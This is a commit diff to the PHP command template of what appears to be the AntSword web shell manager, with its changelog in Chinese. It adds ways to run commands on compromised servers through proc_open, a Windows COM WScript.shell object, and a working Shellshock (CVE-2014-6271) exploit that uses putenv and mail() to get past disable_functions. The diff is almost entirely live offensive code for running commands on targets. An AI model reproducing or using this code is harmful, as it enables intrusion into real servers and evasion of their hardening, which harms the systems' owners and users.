(Enhance:Core) 增加 PHP 执行命令的函数(`proc_open`,`COM('Wscript.shell')`, `shellshock`) #194

4403aca1 · Medicean · 1a2d78b4 · 4403aca1 · 4403aca1
Commit 4403aca1 authored Jun 26, 2019 by Medicean
Hide whitespace changes
Inline Side-by-side

Showing with 43 additions and 2 deletions

CHANGELOG.md CHANGELOG.md +7 -0

command.js source/core/php/template/command.js +36 -2

No files found.
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -4,6 +4,13 @@

 ## `v(2.1.4)`

+### 核心模块
+
+* 增加 PHP 执行命令的函数(`proc_open`,`COM('Wscript.shell')`, `shellshock`) #194
+
+  * `COM` 组件执行命令, 该模块为 Windows 专属, 需要目标在 php.ini 中打开 COM 选项: `com.allow_dcom = true`, 注意, PHP 5.4.5 后,com/dotnet模块已经成了单独的扩展, 所以还需要在 php.ini 中配置 `extension=php_com_dotnet.dll`, 如果 PHP < 5.4.5 则不需要。
+  * `shellshock` 利用 bash 破壳(CVE-2014-6271)执行命令, 需要目标的 `/bin/sh` 链接为 `/bin/bash` 且存在破壳漏洞
+
 ### 文件管理

 * 修复标签页编辑文件时,路径过长导致右侧按钮不显示的 bug (#192)

--- a/source/core/php/template/command.js
+++ b/source/core/php/template/command.js
@@ -9,7 +9,8 @@ module.exports = (arg1, arg2) => ({
      $d=dirname($_SERVER["SCRIPT_FILENAME"]);
      $c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";
      $r="{$p} {$c}";
-      function fe($f){$d=explode(",",@ini_get("disable_functions"));
+      function fe($f){
+        $d=explode(",",@ini_get("disable_functions"));
        if(empty($d)){
          $d=array();
        }else{
@@ -19,6 +20,7 @@ module.exports = (arg1, arg2) => ({
      };
      function runcmd($c){
        $ret=0;
+        $d=dirname($_SERVER["SCRIPT_FILENAME"]);
        if(fe('system')){
          @system($c,$ret);
        }elseif(fe('passthru')){
@@ -31,11 +33,43 @@ module.exports = (arg1, arg2) => ({
        }elseif(fe('popen')){
          $fp=@popen($c,'r');
          while(!@feof($fp)){
-            print(@fgets($fp, 2048));
+            print(@fgets($fp,2048));
          }
          @pclose($fp);
+        }elseif(fe('proc_open')){
+          $p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
+          while(!@feof($io[1])){
+            print(@fgets($io[1],2048));
+          }
+          while(!@feof($io[2])){
+            print(@fgets($io[2],2048));
+          }
+          @fclose($io[1]);
+          @fclose($io[2]);
+          @proc_close($p);
        }elseif(fe('antsystem')){
          @antsystem($c);
+        }elseif(substr($d,0,1)=="/" && fe('mail') && fe('putenv')){
+          if(strstr(readlink("/bin/sh"),"bash")!=FALSE){
+            $tmp=tempnam(sys_get_temp_dir(), 'as');
+            putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1");
+            mail("a@127.0.0.1", "", "", "", "-bv");
+          }else{
+            print("Not vuln (not bash)\n");
+          }
+          $output = @file_get_contents($tmp);
+          @unlink($tmp);
+          if($output!=""){
+            print($output);
+          }else{
+            print("No output, or not vuln.");
+          }
+        }elseif(substr($d,0,1)!="/" && @class_exists("COM")){
+          $w=new COM('WScript.shell');
+          $e=$w->exec($c);
+          $ret=$e->StdOut()->ReadAll();
+          $ret.=$e->StdErr()->ReadAll();
+          print($ret);
        }else{
          $ret = 127;
        }